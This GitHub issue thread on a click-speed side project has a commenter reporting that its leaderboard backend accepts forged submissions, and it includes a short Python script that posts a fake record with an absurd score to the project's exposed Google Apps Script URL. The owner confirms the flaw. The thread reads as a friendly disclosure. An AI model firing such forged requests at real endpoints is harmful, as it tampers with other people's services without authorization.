### ISSUE TITLE
not enough security XD

### ISSUE THREAD

**Issue by fhrrrzy** [zdnpl/showclick#1]
![image](https://user-images.githubusercontent.com/50835800/226185983-9b6883bc-e3b6-4caf-a8e8-a746f5d4f4d3.png)

i suggest you to bring encrypted user data to the backend, then validate it, if its legit, then you can write it to sheet !. goodluck, epic project

**Comment by fhrrrzy** [comment]
this one i do with 3rd party requests

```python
import requests

url = 'https://script.google.com/macros/s/AKfycbzfWQgVNnAe-81e21U0tjB8e8PDx2ejcBppH9O9JFfknH6DvL_AXkSbTRJHPWS9b5WN/exec'
headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'Full Name': 'Anti Stupid', 'CPS': '9999999999999999999999999999999999999', 'Cheat Detector': ''}

response = requests.post(url, headers=headers, data=payload)

print(response.text)```

**Comment by zdnpl** [comment]
yo bro glad to hear that, thanks a lot for hacking my website XD
__
I just didn't expect anyone to do that to my side project.
I have tried the code and it works nicely
after seeing my code, it's my fault for putting the backend URL in a file
that people can easily access, it's really stupid XD
__
but I'm not going to fix it, the website is already dead hwhw. always
success bro!

peace,
Jodan

**Comment by fhrrrzy** [comment]
<3
